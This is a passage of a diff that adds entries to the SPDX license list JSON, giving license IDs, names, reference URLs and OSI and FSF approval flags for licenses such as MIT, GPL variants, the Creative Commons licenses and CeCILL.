+      "licenseId": "CC-BY-ND-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
+      "referenceNumber": 296,
+      "name": "Computational Use of Data Agreement v1.0",
+      "licenseId": "C-UDA-1.0",
+      "seeAlso": [
+        "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
+        "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Barr.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Barr.json",
+      "referenceNumber": 297,
+      "name": "Barr License",
+      "licenseId": "Barr",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Barr"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Vim.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Vim.json",
+      "referenceNumber": 298,
+      "name": "Vim License",
+      "licenseId": "Vim",
+      "seeAlso": [
+        "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
+      "referenceNumber": 299,
+      "name": "GNU General Public License v2.0 w/Classpath exception",
+      "licenseId": "GPL-2.0-with-classpath-exception",
+      "seeAlso": [
+        "https://www.gnu.org/software/classpath/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
+      "referenceNumber": 300,
+      "name": "BitTorrent Open Source License v1.1",
+      "licenseId": "BitTorrent-1.1",
+      "seeAlso": [
+        "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
+      "referenceNumber": 301,
+      "name": "Common Documentation License 1.0",
+      "licenseId": "CDL-1.0",
+      "seeAlso": [
+        "http://www.opensource.apple.com/cdl/",
+        "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
+        "https://www.gnu.org/licenses/license-list.html#ACDL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
+      "referenceNumber": 302,
+      "name": "Creative Commons Attribution Share Alike 1.0 Generic",
+      "licenseId": "CC-BY-SA-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ADSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ADSL.json",
+      "referenceNumber": 303,
+      "name": "Amazon Digital Services License",
+      "licenseId": "ADSL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/PostgreSQL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
+      "referenceNumber": 304,
+      "name": "PostgreSQL License",
+      "licenseId": "PostgreSQL",
+      "seeAlso": [
+        "http://www.postgresql.org/about/licence",
+        "https://opensource.org/licenses/PostgreSQL"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
+      "referenceNumber": 305,
+      "name": "SIL Open Font License 1.1",
+      "licenseId": "OFL-1.1",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+        "https://opensource.org/licenses/OFL-1.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
+      "referenceNumber": 306,
+      "name": "Netscape Public License v1.0",
+      "licenseId": "NPL-1.0",
+      "seeAlso": [
+        "http://www.mozilla.org/MPL/NPL/1.0/"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/xinetd.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/xinetd.json",
+      "referenceNumber": 307,
+      "name": "xinetd License",
+      "licenseId": "xinetd",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
+      "referenceNumber": 308,
+      "name": "GNU Library General Public License v2 only",
+      "licenseId": "LGPL-2.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
+      "referenceNumber": 309,
+      "name": "zlib/libpng License with Acknowledgement",
+      "licenseId": "zlib-acknowledgement",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
+      "referenceNumber": 310,
+      "name": "Open LDAP Public License v2.2.1",
+      "licenseId": "OLDAP-2.2.1",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/APSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
+      "referenceNumber": 311,
+      "name": "Apple Public Source License 1.0",
+      "licenseId": "APSL-1.0",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
+      "referenceNumber": 312,
+      "name": "Lawrence Berkeley National Labs BSD variant license",
+      "licenseId": "BSD-3-Clause-LBNL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GLWTPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
+      "referenceNumber": 313,
+      "name": "Good Luck With That Public License",
+      "licenseId": "GLWTPL",
+      "seeAlso": [
+        "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
+      "referenceNumber": 314,
+      "name": "GNU Lesser General Public License v3.0 only",
+      "licenseId": "LGPL-3.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+        "https://opensource.org/licenses/LGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGC-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
+      "referenceNumber": 315,
+      "name": "OGC Software License, Version 1.0",
+      "licenseId": "OGC-1.0",
+      "seeAlso": [
+        "https://www.ogc.org/ogc/software/1.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Dotseqn.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
+      "referenceNumber": 316,
+      "name": "Dotseqn License",
+      "licenseId": "Dotseqn",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Dotseqn"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MakeIndex.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
+      "referenceNumber": 317,
+      "name": "MakeIndex License",
+      "licenseId": "MakeIndex",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MakeIndex"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
+      "referenceNumber": 318,
+      "name": "GNU General Public License v3.0 only",
+      "licenseId": "GPL-3.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+        "https://opensource.org/licenses/GPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
+      "referenceNumber": 319,
+      "name": "BSD 3-Clause No Nuclear License 2014",
+      "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
+      "seeAlso": [
+        "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
+      "referenceNumber": 320,
+      "name": "GNU General Public License v1.0 only",
+      "licenseId": "GPL-1.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/IJG.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/IJG.json",
+      "referenceNumber": 321,
+      "name": "Independent JPEG Group License",
+      "licenseId": "IJG",
+      "seeAlso": [
+        "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
+      "referenceNumber": 322,
+      "name": "Affero General Public License v1.0 or later",
+      "licenseId": "AGPL-1.0-or-later",
+      "seeAlso": [
+        "http://www.affero.org/oagpl.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
+      "referenceNumber": 323,
+      "name": "SIL Open Font License 1.1 with no Reserved Font Name",
+      "licenseId": "OFL-1.1-no-RFN",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+        "https://opensource.org/licenses/OFL-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
+      "referenceNumber": 324,
+      "name": "Boost Software License 1.0",
+      "licenseId": "BSL-1.0",
+      "seeAlso": [
+        "http://www.boost.org/LICENSE_1_0.txt",
+        "https://opensource.org/licenses/BSL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Libpng.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Libpng.json",
+      "referenceNumber": 325,
+      "name": "libpng License",
+      "licenseId": "Libpng",
+      "seeAlso": [
+        "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
+      "referenceNumber": 326,
+      "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
+      "licenseId": "CC-BY-NC-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
+      "referenceNumber": 327,
+      "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
+      "licenseId": "CC-BY-NC-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Unlicense.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
+      "referenceNumber": 328,
+      "name": "The Unlicense",
+      "licenseId": "Unlicense",
+      "seeAlso": [
+        "https://unlicense.org/"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
+      "referenceNumber": 329,
+      "name": "Lucent Public License Version 1.0",
+      "licenseId": "LPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/LPL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
+      "referenceNumber": 330,
+      "name": "bzip2 and libbzip2 License v1.0.5",
+      "licenseId": "bzip2-1.0.5",
+      "seeAlso": [
+        "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
+        "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Entessa.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Entessa.json",
+      "referenceNumber": 331,
+      "name": "Entessa Public License v1.0",
+      "licenseId": "Entessa",
+      "seeAlso": [
+        "https://opensource.org/licenses/Entessa"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
+      "referenceNumber": 332,
+      "name": "BSD-2-Clause Plus Patent License",
+      "licenseId": "BSD-2-Clause-Patent",
+      "seeAlso": [
+        "https://opensource.org/licenses/BSDplusPatent"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ECL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
+      "referenceNumber": 333,
+      "name": "Educational Community License v2.0",
+      "licenseId": "ECL-2.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/ECL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Crossword.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Crossword.json",
+      "referenceNumber": 334,
+      "name": "Crossword License",
+      "licenseId": "Crossword",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Crossword"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
+      "referenceNumber": 335,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
+      "licenseId": "CC-BY-NC-ND-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OCLC-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
+      "referenceNumber": 336,
+      "name": "OCLC Research Public License 2.0",
+      "licenseId": "OCLC-2.0",
+      "seeAlso": [
+        "http://www.oclc.org/research/activities/software/license/v2final.htm",
+        "https://opensource.org/licenses/OCLC-2.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
+      "referenceNumber": 337,
+      "name": "CeCILL Free Software License Agreement v1.1",
+      "licenseId": "CECILL-1.1",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
+      "referenceNumber": 338,
+      "name": "CeCILL Free Software License Agreement v2.1",
+      "licenseId": "CECILL-2.1",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
+      "referenceNumber": 339,
+      "name": "Taiwan Open Government Data License, version 1.0",
+      "licenseId": "OGDL-Taiwan-1.0",
+      "seeAlso": [
+        "https://data.gov.tw/license"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Abstyles.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
+      "referenceNumber": 340,
+      "name": "Abstyles License",
+      "licenseId": "Abstyles",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Abstyles"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/libselinux-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
+      "referenceNumber": 341,
+      "name": "libselinux public domain notice",
+      "licenseId": "libselinux-1.0",
+      "seeAlso": [
+        "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ANTLR-PD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
+      "referenceNumber": 342,
+      "name": "ANTLR Software Rights Notice",
+      "licenseId": "ANTLR-PD",
+      "seeAlso": [
+        "http://www.antlr2.org/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
+      "referenceNumber": 343,
+      "name": "GNU General Public License v2.0 or later",
+      "licenseId": "GPL-2.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+        "https://opensource.org/licenses/GPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/IPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
+      "referenceNumber": 344,
+      "name": "IBM Public License v1.0",
+      "licenseId": "IPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/IPL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-enna.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
+      "referenceNumber": 345,
+      "name": "enna License",
+      "licenseId": "MIT-enna",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MIT#enna"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CPOL-1.02.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
+      "referenceNumber": 346,
+      "name": "Code Project Open License 1.02",
+      "licenseId": "CPOL-1.02",
+      "seeAlso": [
+        "http://www.codeproject.com/info/cpol10.aspx"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
+      "referenceNumber": 347,
+      "name": "Creative Commons Attribution Share Alike 3.0 Austria",
+      "licenseId": "CC-BY-SA-3.0-AT",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
+      "referenceNumber": 348,
+      "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
+      "licenseId": "GPL-3.0-with-GCC-exception",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/gcc-exception-3.1.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
+      "referenceNumber": 349,
+      "name": "BSD 1-Clause License",
+      "licenseId": "BSD-1-Clause",
+      "seeAlso": [
+        "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NTP-0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
+      "referenceNumber": 350,
+      "name": "NTP No Attribution",
+      "licenseId": "NTP-0",
+      "seeAlso": [
+        "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
+      "referenceNumber": 351,
+      "name": "SugarCRM Public License v1.1.3",
+      "licenseId": "SugarCRM-1.1.3",
+      "seeAlso": [
+        "http://www.sugarcrm.com/crm/SPL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT.json",
+      "referenceNumber": 352,
+      "name": "MIT License",
+      "licenseId": "MIT",
+      "seeAlso": [
+        "https://opensource.org/licenses/MIT"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
+      "referenceNumber": 353,
+      "name": "SIL Open Font License 1.1 with Reserved Font Name",
+      "licenseId": "OFL-1.1-RFN",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+        "https://opensource.org/licenses/OFL-1.1"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Watcom-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
+      "referenceNumber": 354,
+      "name": "Sybase Open Watcom Public License 1.0",
+      "licenseId": "Watcom-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/Watcom-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
+      "referenceNumber": 355,
+      "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
+      "licenseId": "CC-BY-NC-SA-2.0-FR",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ODbL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
+      "referenceNumber": 356,
+      "name": "Open Data Commons Open Database License v1.0",
+      "licenseId": "ODbL-1.0",
+      "seeAlso": [
+        "http://www.opendatacommons.org/licenses/odbl/1.0/",
+        "https://opendatacommons.org/licenses/odbl/1-0/"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/FSFULLR.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
+      "referenceNumber": 357,
+      "name": "FSF Unlimited License (with License Retention)",
+      "licenseId": "FSFULLR",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
+      "referenceNumber": 358,
+      "name": "Open LDAP Public License v1.3",
+      "licenseId": "OLDAP-1.3",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
+      "referenceNumber": 359,
+      "name": "SSH OpenSSH license",
+      "licenseId": "SSH-OpenSSH",
+      "seeAlso": [
+        "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
+      "referenceNumber": 360,
+      "name": "BSD 2-Clause \"Simplified\" License",
+      "licenseId": "BSD-2-Clause",
+      "seeAlso": [
+        "https://opensource.org/licenses/BSD-2-Clause"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/HPND.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/HPND.json",
+      "referenceNumber": 361,
+      "name": "Historical Permission Notice and Disclaimer",
+      "licenseId": "HPND",
+      "seeAlso": [
+        "https://opensource.org/licenses/HPND"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
+      "referenceNumber": 362,
+      "name": "Zimbra Public License v1.3",
+      "licenseId": "Zimbra-1.3",
+      "seeAlso": [
+        "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
